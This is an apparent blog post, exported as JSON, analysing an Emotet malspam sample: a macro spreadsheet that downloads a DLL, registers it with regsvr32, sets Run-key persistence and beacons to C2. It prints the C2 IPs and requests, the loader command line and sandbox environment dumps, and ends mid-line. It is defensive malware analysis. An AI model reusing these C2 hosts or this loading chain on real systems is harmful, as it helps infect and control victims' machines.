{"id":1517,"date":"2022-03-15T20:47:40","date_gmt":"2022-03-16T01:47:40","guid":{"rendered":"https:\/\/www.herbiez.com\/?p=1517"},"modified":"2022-03-16T00:42:08","modified_gmt":"2022-03-16T05:42:08","slug":"2022-03-14-emotet-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1517","title":{"rendered":"2022-03-14 Emotet Malspam"},"content":{"rendered":"

Summary
\n========
\nAs part of brushing the “rust” off and getting back into the malware analysis and blogging thing, and since I have some free time since I am on holiday, I decided to see what was in the mail filters for anything interesting or fun to play with. I did come across an email that had an encrypted zip attachment that was an Excel spreadsheet that leveraged a macro in it. For this post, I am not digging into the macro. This will be a simple analysis post. As usual, all the artifacts from this investigation can be found over in my Github<\/a>. The IOCs can be found at the end of the post or via this link here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

****NOTE****<\/strong>
\nI had some issues with a bug<\/a> that I was running into with one of the latest versions of ProcMon last night and had to re-run things to get a better version of the ProcMon logs. For that one though, I skipped the “middle man” and just registered the malicious DLL manually to kick off the infection chain. Normally this would have executed via the macro found in the spreadsheet once the macro was enabled. I did include both ProcMon logs for reference though. Also, any references to PID 1616 is from the first ProcMon log. PID 4776 is the equivalent to PID 1616.
\n***\/NOTE****<\/strong><\/p>\n

Analysis
\n========
\nFrom a malware perspective this is a pretty straight forward compromise on both the network side and also the host side.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

Once the spreadsheet is downloaded and opened Excel prompts the user to enable the malicious macro as seen below.<\/p>\n

\"\"<\/a><\/p>\n

Once the macro has been enabled, the compromise chain starts. First, the macro goes and downloads a DLL file from the site arkpp[.]com. The DLL was downloaded to the “C:\\Users\\%username%\\fbd.dll” location (notice the difference in names between the PCAP and once it lands on the host) .<\/p>\n

\"\"<\/a><\/p>\n

As a side note, the malware author must like dogs as you can see various dog breeds in the stream and within the binary as well.<\/p>\n

\"\"<\/a><\/p>\n

The file downloaded is called “Qbazm0Hh6NAHgHzpXWnpP.dll” in the PCAP (I renamed it to 2022-03-14-emotet.dll for the “good” ProcMon log and also from the PCAP as 9K1.bin) but is originally named “fbd.dll” and is what is leveraged using regsvr32.exe to register the malicious DLL into Windows. Once that has been registered and the initial process is running, two more child processes are then spawned off the initial one and are killed off automatically until there is only one regsvr32.exe process running with no parent process. The interesting thing about these three processes are what they are doing\/touching as it seems like each process is performing a certain function with regards to filesystem and registry “touches”.<\/p>\n

Using the “good” version of the ProcMon log, I looked at the three different regsvr32.exe processes filtering on the PIDs to see each process in isolation. Starting with PID 4104 (the parent) this one looks like it really is meant to get started up, then spawn the next child process (PID 5544), and then exit out as seen below.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

Jumping over to PID 5544 there is an obvious difference in what the process is doing when compared to the parent. This process looks to be querying various registry settings with a noticeable pattern that looks to be what is called COM abuse since I am seeing numerous queries for different CLSIDs and INPROCSERVER32\/LOCALSERVER32 based on some quick Google searches. I came across two good posts about this which can be found here<\/a> and here<\/a>. If this is COM abuse, this would give the malware a level of persistence. See Mitre’s ATT&CK<\/a> for the TL;DR of COM abuse\/hijacking. Unfortunately using the PoSH commands found in both posts I was not able to replicate what they were seeing with an exposed COM object on my test VM. I went back and used ProcMon to see if there was anything modified with regards to either INPROCSERVER32\/LOCALSERVER32 registry keys and could not see anything in the log. Outside of that activity, there is a lot of fingerprinting activity that the process is doing as seen below.<\/p>\n

\"\"<\/a><\/p>\n

It is also responsible for copying the original DLL (Qbazm0Hh6NAHgHzpXWnpP.dll\/fbd.dll) from the original location to the “C:\\Users\\%username%\\AppData\\Local\\<random string>\\<random string>.<random 3 characters>” and renaming it as seen below.<\/p>\n

\"\"<\/a><\/p>\n

Which it then finally closes itself out, and creates the final regsvr32.exe process (PID 4776).<\/p>\n

\"\"<\/a><\/p>\n

The third and final regsvr32 process also continued to perform OS fingerprinting activities, but was reading various crypto registry keys, internet settings, and loading various DLL files related to web calls.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

It then proceeded to set the persistence mechanism in the “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\” registry location.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

Once this process was up and running, it starts beaconing back out to the C2 as seen below.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

I went back and took a look at the “messed up” ProcMon logs and it looks like the log is fine, it is just the newer version of ProcMon that is a little buggy. Anyways, looking at the initial download of the DLL via the Excel process, I noticed that the sizes recorded in ProcMon and in Wireshark are pretty close to each other.<\/p>\n

\"\"<\/a><\/p>\n

I also used a tool called “strings2<\/a>” to pull strings from the running regsvr32.exe prcoess (PID 1616 from the first ProcMon log) and piped that out to a log file. The following are some more of the interesting strings that I was able to find in this process. For example, I was able to find some more IP addresses that look to be used as possible C2s. I also found an interesting string (<EXE NAME=”regsvr32.exe” ID=”{c7a85eba-c2d1-41ec-c656-ca2c9221e354}” DBID=”{11111111-1111-1111-1111-111111111111}”\/>) that looks to be related to AppShimming. Some more Googling around and I came across another great post<\/a> from the folks at Red Canary talking about application shims. Based on some of the info in that post, I went back to the second ProcMon log and filtered for anything “SDB” in the path. Sure enough there were hits for the shim database for each process of regsvr32.exe.<\/p>\n

\"\"<\/a><\/p>\n

While also just searching for keywords in the log, I did come across some bits of my system information as well as seen below.<\/p>\n

\r\nGET GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP\/1.1\r\nCookiez=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w\/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXgBX9QtKz6Ek3r3x7c6K3crDodv4D31dMZLNEYMHvc8rlRRPC\/YH+mKNT2O\r\nHost192.99.251.50GET \/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP\/1.1\r\nConnectionKeep-Alive\r\nCache-Controlno-cache\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nBOBSXPC_B4A6FEC6\r\n<\/pre>\n
And also some dead nginx sites as well.<\/p>\n
\r\nGET \/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP\/1.1\r\nCookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w\/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY\/fmRl8hDyeSAa\/4Fm2pZzBzG\/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==\r\nHost: 217.182.143.248:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nMSAFD Irda [IrDA]\r\nMSAFD Tcpip [UDP\/IPv6]\r\nMSAFD L2CAP [Bluetooth]\r\n8\r\nHTTP\/1.1 502 Bad Gateway\r\nServer: nginx\r\nDate: Tue, 15 Mar 2022 02:01:31 GMT\r\nContent-Type: text\/html\r\nContent-Length: 173\r\nConnection: keep-alive\r\n<\/pre>\n
The following section are the other strings that I found interesting.<\/p>\n
\r\nQuery: ":8080"\r\n---------------\r\nLine 16962: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 16963: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 17776: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 17792: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 18469: 217.182.143.248:8080\r\nLine 18503: https:\/\/217.182.143.248:8080\/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv\r\nLine 18543: https:\/\/217.182.143.248:8080\/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv\r\nLine 18550: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 18668: Host: 217.182.143.248:8080\r\nLine 19007: https:\/\/217.182.143.248:8080\/pjUXpuZmP\r\nLine 19015: https:\/\/217.182.143.248:8080\/pjUXpuZmP\r\nLine 20396: 217.182.143.248:8080\r\nLine 20701: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20736: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20742: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20758: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20824: https:\/\/217.182.143.248:8080\/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW\r\nLine 20861: https:\/\/217.182.143.248:8080\/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW\r\nLine 21105: https:\/\/185.4.135.27:8080\/\r\nLine 21274: https:\/\/185.4.135.27:8080\/\r\nLine 21317: 185.4.135.27:8080\r\nLine 21374: 217.182.143.248:8080\r\nLine 21379: 217.182.143.248:8080\r\n\r\nQuery: "https:"\r\n----------------\r\nLine 16962: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 16963: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 17776: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 17792: https:\/\/217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR\r\nLine 18503: https:\/\/217.182.143.248:8080\/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv\r\nLine 18527: https:\/\/217.182.143.248\/\r\nLine 18538: https:\/\/217.182.143.248\/\r\nLine 18543: https:\/\/217.182.143.248:8080\/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv\r\nLine 18550: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 19007: https:\/\/217.182.143.248:8080\/pjUXpuZmP\r\nLine 19015: https:\/\/217.182.143.248:8080\/pjUXpuZmP\r\nLine 20279: https:\/\/192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nLine 20289: https:\/\/192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nLine 20701: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20736: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20742: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20758: https:\/\/185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh\r\nLine 20824: https:\/\/217.182.143.248:8080\/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW\r\nLine 20861: https:\/\/217.182.143.248:8080\/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW\r\nLine 21105: https:\/\/185.4.135.27:8080\/\r\nLine 21148: https:\/\/192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nLine 21151: https:\/\/192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nLine 21173: https:\/\/192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq\r\nLine 21274: https:\/\/185.4.135.27:8080\/\r\nLine 21369: https:\/\/192.99.251.50\/\r\nLine 21372: https:\/\/192.99.251.50\/\r\nLine 21378: https:\/\/192.99.251.50\/\r\nLine 21380: https:\/\/192.99.251.50\/\r\nLine 21398: https:\/\/192.99.251.50\/\r\nLine 21399: https:\/\/185.4.135.27\/\r\nLine 21401: https:\/\/185.4.135.27\/\r\n\r\nQuery: "regsvr32.exe"\r\n----------------------\r\nLine 28: \\regsvr32.exe\r\nLine 345: REGSVR32.EXE\r\nLine 1918: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 2083: Microsoft.Windows.RegSvr32,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 2190: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 2259: The module "%1" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe.\r\nLine 2283: REGSVR32.EXE.MUI\r\nLine 2431: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 13917: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 13918: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 13919: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 16665: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 16666: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 16667: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 16732: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 16737: C:\\Windows\\Temp\\AslLog_ApphelpDebug_regsvr32.exe_1616.txt\r\nLine 16742: C:\\Windows\\Temp\\AslLog_shimengstate_regsvr32.exe_1616.txt\r\nLine 16744: C:\\Windows\\Temp\\AslLog_ShimDebugLog_regsvr32.exe_1616.txt\r\nLine 16765: &amp;amp;amp;amp;amp;amp;lt;EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"\/&amp;amp;amp;amp;amp;amp;gt;\r\nLine 16980: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 17180: regsvr32.exe\r\nLine 17188: regsvr32.exe\r\nLine 17255: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 17256: \\Device\\HarddiskVolume1\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 17327: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 19955: regsvr32.exe\r\nLine 21257: %s\\regsvr32.exe \/s "%s\\%s"\r\nLine 22836: regsvr32.exe:1616 Properties\r\nLine 23048: regsvr32.exe(00000650) (netsvcs) Properties\r\nLine 23166: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 36483: C:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 46610: [zC:\\Windows\\SysWOW64\\regsvr32.exe\r\nLine 378706: regsvr32.exe\r\nLine 612840: C:\\Windows\\SysWOW64\\regsvr32.exe\r\n\r\nQuery: "c7a85eba-c2d1-41ec-c656-ca2c9221e354" and the lines around that \r\n---------------------------------------------------------------------------\r\n=C:=C:\\Users\\bob\\Desktop\r\nALLUSERSPROFILE=C:\\ProgramData\r\nAPPDATA=C:\\Users\\bob\\AppData\\Roaming\r\nChocolateyInstall=C:\\ProgramData\\chocolatey\r\nChocolateyLastPathUpdate=132853495844597753\r\nChocolateyToolsLocation=C:\\Tools\r\nCommonProgramFiles=C:\\Program Files (x86)\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BOBS-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nDriverData=C:\\Windows\\System32\\Drivers\\DriverData\r\nFPS_BROWSER_APP_PROFILE_STRING=Internet Explorer\r\nFPS_BROWSER_USER_PROFILE_STRING=Default\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\bob\r\nJAVA_HOME=C:\\Program Files\\OpenJDK\\openjdk-11.0.13_8\r\nLOCALAPPDATA=C:\\Users\\bob\\AppData\\Local\r\nLOGONSERVER=\\\\BOBS-PC\r\nNUMBER_OF_PROCESSORS=4\r\nOneDrive=C:\\Users\\bob\\OneDrive\r\nOS=Windows_NT\r\nPath=C:\\Program Files\\Microsoft Office 15\\Root\\Office15\\;C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Python37\\Scripts\\;C:\\Python37\\;C:\\Python27\\;C:\\Python27\\Scripts;C:\\ProgramData\\Boxstarter;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\ProgramData\\chocolatey\\bin;C:\\Program Files\\Puppet Labs\\Puppet\\bin;C:\\Program Files\\OpenJDK\\openjdk-11.0.13_8\\bin;C:\\Program Files\\nodejs\\;C:\\Program Files\\Microsoft VS Code\\bin;C:\\Users\\bob\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Tools\\Cmder;;C:\\ProgramData\\chocolatey\\lib\\radare2.flare\\tools\\radare2\\bin;C:\\Tools\\java-deobfuscator-gui;C:\\Tools\\Bytecode-Viewer;C:\\Program Files (x86)\\Nmap;C:\\ProgramData\\chocolatey\\lib\\rawcap\\tools\\rawcap;C:\\Tools\\pyinstxtractor;C:\\Tools\\oledump;C:\\Tools\\rtfdump;C:\\Tools\\msoffcrypto-crack;C:\\Program Files (x86)\\pdfid;C:\\Program Files (x86)\\pdfparser;C:\\pdfstreamdumper;C:\\iDefense\\SysAnalyzer;C:\\Users\\bob\\AppData\\Local\\Programs\\Fiddler;C:\\Users\\bob\\AppData\\Roaming\\npm;C:\\Program Files\\Microsoft Office 15\\root\\Client\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW\r\nPROCESSOR_ARCHITECTURE=x86\r\nPROCESSOR_ARCHITEW6432=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=8c01\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files (x86)\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program Files\r\nPROMPT=FLARE$S$d$s$t$_$p$+$g\r\nPSModulePath=C:\\Users\\bob\\Documents\\WindowsPowerShell\\Modules\r\nPUBLIC=C:\\Users\\Public\r\nRAW_TOOLS_DIR=C:\\Tools\r\nSESSIONNAME=Console\r\nSSLKEYLOGFILE=C:\\Users\\bob\\Documents\\ssl-keys.log\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\bob\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\bob\\AppData\\Local\\Temp\r\nTOOL_LIST_DIR=C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\FLARE\r\nTOOL_LIST_SHORTCUT=C:\\Users\\bob\\Desktop\\FLARE.lnk\r\nUSERDOMAIN=BOBS-PC\r\nUSERDOMAIN_ROAMINGPROFILE=BOBS-PC\r\nUSERNAME=bob\r\nUSERPROFILE=C:\\Users\\bob\r\nVM_COMMON_DIR=C:\\ProgramData\\FEVM\r\nwindir=C:\\Windows\r\n_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\\symbols*http:\/\/msdl.microsoft.com\/download\/symbols\r\nC:\\Users\\bob\\Desktop\\\r\nC:\\Windows\\SysWOW64\\regsvr32.exe\r\nC:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nC:\\Windows\\SysWOW64\\regsvr32.exe\r\nWinsta0\\Default\r\n=::=::\\\r\n=C:=C:\\Users\\bob\\Desktop\r\nALLUSERSPROFILE=C:\\ProgramData\r\nAPPDATA=C:\\Users\\bob\\AppData\\Roaming\r\nChocolateyInstall=C:\\ProgramData\\chocolatey\r\nChocolateyLastPathUpdate=132853495844597753\r\nChocolateyToolsLocation=C:\\Tools\r\nCommonProgramFiles=C:\\Program Files (x86)\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BOBS-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nDriverData=C:\\Windows\\System32\\Drivers\\DriverData\r\nFPS_BROWSER_APP_PROFILE_STRING=Internet Explorer\r\nFPS_BROWSER_USER_PROFILE_STRING=Default\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\bob\r\nJAVA_HOME=C:\\Program Files\\OpenJDK\\openjdk-11.0.13_8\r\nLOCALAPPDATA=C:\\Users\\bob\\AppData\\Local\r\nLOGONSERVER=\\\\BOBS-PC\r\nNUMBER_OF_PROCESSORS=4\r\nOneDrive=C:\\Users\\bob\\OneDrive\r\nOS=Windows_NT\r\nPath=C:\\Program Files\\Microsoft Office 15\\Root\\Office15\\;C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Python37\\Scripts\\;C:\\Python37\\;C:\\Python27\\;C:\\Python27\\Scripts;C:\\ProgramData\\Boxstarter;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\ProgramData\\chocolatey\\bin;C:\\Program Files\\Puppet Labs\\Puppet\\bin;C:\\Program Files\\OpenJDK\\openjdk-11.0.13_8\\bin;C:\\Program Files\\nodejs\\;C:\\Program Files\\Microsoft VS Code\\bin;C:\\Users\\bob\\AppData\\Local\\Microsoft\\WindowsApps;C:\\Tools\\Cmder;;C:\\ProgramData\\chocolatey\\lib\\radare2.flare\\tools\\radare2\\bin;C:\\Tools\\java-deobfuscator-gui;C:\\Tools\\Bytecode-Viewer;C:\\Program Files (x86)\\Nmap;C:\\ProgramData\\chocolatey\\lib\\rawcap\\tools\\rawcap;C:\\Tools\\pyinstxtractor;C:\\Tools\\oledump;C:\\Tools\\rtfdump;C:\\Tools\\msoffcrypto-crack;C:\\Program Files (x86)\\pdfid;C:\\Program Files (x86)\\pdfparser;C:\\pdfstreamdumper;C:\\iDefense\\SysAnalyzer;C:\\Users\\bob\\AppData\\Local\\Programs\\Fiddler;C:\\Users\\bob\\AppData\\Roaming\\npm;C:\\Program Files\\Microsoft Office 15\\root\\Client\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW\r\nPROCESSOR_ARCHITECTURE=x86\r\nPROCESSOR_ARCHITEW6432=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=8c01\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files (x86)\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program Files\r\nPROMPT=FLARE$S$d$s$t$_$p$+$g\r\nPSModulePath=C:\\Users\\bob\\Documents\\WindowsPowerShell\\Modules\r\nPUBLIC=C:\\Users\\Public\r\nRAW_TOOLS_DIR=C:\\Tools\r\nSESSIONNAME=Console\r\nSSLKEYLOGFILE=C:\\Users\\bob\\Documents\\ssl-keys.log\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\bob\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\bob\\AppData\\Local\\Temp\r\nTOOL_LIST_DIR=C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\FLARE\r\nTOOL_LIST_SHORTCUT=C:\\Users\\bob\\Desktop\\FLARE.lnk\r\nUSERDOMAIN=BOBS-PC\r\nUSERDOMAIN_ROAMINGPROFILE=BOBS-PC\r\nUSERNAME=bob\r\nUSERPROFILE=C:\\Users\\bob\r\nVM_COMMON_DIR=C:\\ProgramData\\FEVM\r\nwindir=C:\\Windows\r\n_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\\symbols*http:\/\/msdl.microsoft.com\/download\/symbols\r\nC:\\Windows\\SYSTEM32\\ntdll.dll\r\nC:\\Windows\\System32\r\nC:\\Windows\\SYSTEM32;C:\\Windows\\system;C:\\Windows;\r\nvI}m\r\nC:\\Users\\bob\\Desktop\\\r\nC:\\Windows\\SYSTEM32\\apphelp.dll\r\nvaoC\r\nC:\\Windows\\System32\\KERNEL32.DLL\r\n\\l#mW\r\nC:\\Windows\\System32\\KERNELBASE.dll\r\nC:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\n2\r\nRC\r\nTLt0\r\nApphelpDebug\r\nC:\\Windows\\Temp\\AslLog_ApphelpDebug_regsvr32.exe_1616.txt\r\n. }$\r\nTLtX\r\nApphelp\r\nshimengstate\r\nC:\\Windows\\Temp\\AslLog_shimengstate_regsvr32.exe_1616.txt\r\nShimDebugLog\r\nC:\\Windows\\Temp\\AslLog_ShimDebugLog_regsvr32.exe_1616.txt\r\nSHA1\r\nMicrosoft Primitive Provider\r\nbcryptprimitives.dll\r\nC:\\Windows\\SYSTEM32\\AcLayers.dll\r\n_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\\symbols*http:\/\/msdl.microsoft.com\/download\/symbols\r\nC:\\Windows\\System32\\msvcrt.dll\r\nJAVA_HOME=C:\\Program Files\\OpenJDK\\openjdk-11.0.13_8\r\nTOOL_LIST_DIR=C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\FLARE\r\nUSER32.dll\r\nC:\\Windows\\System32\\USER32.dll\r\nenforcesigninglevelfordependentmodules\r\nSSLKEYLOGFILE=C:\\Users\\bob\\Documents\\ssl-keys.log\r\nTOOL_LIST_SHORTCUT=C:\\Users\\bob\\Desktop\\FLARE.lnk\r\nC:\\Windows\\System32\\win32u.dll\r\nonlyallowcontrolflowguardenabledbinaries\r\nGDI32.dll\r\n&amp;amp;amp;amp;amp;amp;lt;?xml version="1.0" encoding="utf-8"?&amp;amp;amp;amp;amp;amp;gt;\r\n\r\n&amp;amp;amp;amp;amp;amp;lt;MATCHED_ENTRIES&amp;amp;amp;amp;amp;amp;gt;\r\n\r\n&amp;amp;amp;amp;amp;amp;lt;EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"\/&amp;amp;amp;amp;amp;amp;gt;\r\n\r\n&amp;amp;amp;amp;amp;amp;lt;\/MATCHED_ENTRIES&amp;amp;amp;amp;amp;amp;gt;\r\n\r\nQuery: "outnpny"\r\n-----------------\r\nLine 1918: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 2296: C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb\r\nLine 2432: C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb\r\nLine 13918: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 16666: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 16732: C:\\Windows\\SysWOW64\\regsvr32.exe \/s "C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb"\r\nLine 16900: C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb\r\nLine 17676: Emehnrnpmefb\\outnpny.kzb\r\nLine 18454: outnpny.kzb\r\nLine 23167: C:\\Users\\bob\\AppData\\Local\\Emehnrnpmefb\\outnpny.kzb\r\nLine 23831: outnpny.kzb\r\n\r\nQuery: "S-1-5-21-3461203602-4096304019-2269080069" - My system 